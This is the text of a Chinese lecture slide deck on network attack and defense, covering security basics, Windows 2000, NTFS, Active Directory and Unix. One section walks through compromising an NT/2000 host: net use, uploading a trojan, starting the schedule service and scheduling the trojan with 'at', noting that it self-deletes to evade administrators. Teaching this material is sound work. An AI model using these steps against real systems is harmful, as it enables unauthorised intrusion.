网络攻击与防御.ppt

网络攻击与防御
本节提要



网络安全概述
网络安全定义
指网络系统的硬件、软件及系统中的数据受到保护,不会遭受恶意的破坏、更改和泄漏,系统可以正常的运行
网络安全概述
什么是不安全的网络环境
信息丢失
信息战
内部泄密
外部泄密
自然灾害、意外事故
计算机犯罪
网络协议中的缺陷,例如TCP/IP协议的缺陷
电子谍报,比如信息流量分析、信息窃取等
人为行为,比如使用不当,安全意识差等
“黑客”行为,比如非法访问、非法连接
一个关于网络安全的实例
一次迅速入侵NT架构操作系统的方法
操作系统平台:必须为NT,;WorkStation 或Server;还可以是WIN2000。 
用于启动远程主机的schedule服务。 , use \\ip 连接上目标主机。把木马上传到目标主机。
建议放在你共享的所在目录,或系统目录WINNT下,执行时不用再输入程序所在路径。木马都有自我删除功能,所以一般不会被管理员发现。 上传木马后,键入: C:/>netsvc \\ip schedule /start 启动目标主机的schedule服务(schedule服务用来定时执行某程序,我们可利用它来执行木马程序)。这过程可能会持续较久,一定要等到提示符出现才进行下一步,然后键入C:/>net time \\ip 将显示目标主机的系统时间,如:14:43 记住这时间,接下来用AT命令往目标主机添加入定时启动木马程序的任务,键入: C:/>at \\ip 14:45  注意:这里我启动时间定为14:45而不是14:43,往后推迟了几分钟,这是考虑到命令往返于两机需要一定的时间至此,你只要等稍等几分钟过去,就可以打开你的木马客户器控制目标主机了,也不用那么麻烦地执行程序啦!
入侵分析
这次入侵使用了一些DOS系统中的常用命令
use \\ip
C:/>netsvc \\ip schedule /start 
C:/>net time \\ip 
C:/>at \\ip 14:45

学习网络攻击与防御我们需要哪些知识







操作系统介绍
常用操作系统的架构介绍

Windows2000server系统
特点:

2. win2000系统支持127位的字符口令
3. Active Directory 与 Windows 2000 安全服务(如 Kerberos 身份验证协议、公钥基本结构、加密文件系统(EFS)、安全性配置管理器、组策略以及委派管理等)紧密集成。
说明
(New Technology File System)
微软Windows NT内核的系列操作系统支持的、一个特别为网络和磁盘配额、文件加密等管理安全特性设计的磁盘格式。随着以NT为内核的 Windows 2000/XP的普及,很多个人用户开始用到了NTFS。NTFS也是以簇为单位来存储数据文件,但NTFS中簇的大小并不依赖于磁盘或分区的大小。簇尺寸的缩小不但降低了磁盘空间的浪费,还减少了产生磁盘碎片的可能。NTFS支持文件加密管理功能,可为用户提供更高层次的安全保证。
说明
Active Directory
是指Windows 2000网络中的目录服务。它有两个作用:
1. 目录服务功能

该技术还可以用来确保只有那些经过授权的用户或应用程序方可获准在具备安全保障的前提自下针对相关资源实施访问调用。
Unix系统架构介绍
UNIX ,是一个强大的多用户、多任务操作系统,支持多种处理器架构
unix是基于命令行的操作系统
Unix操作系统通常被分成三个主要部分:内核(Kernel)、Shell和文件系统。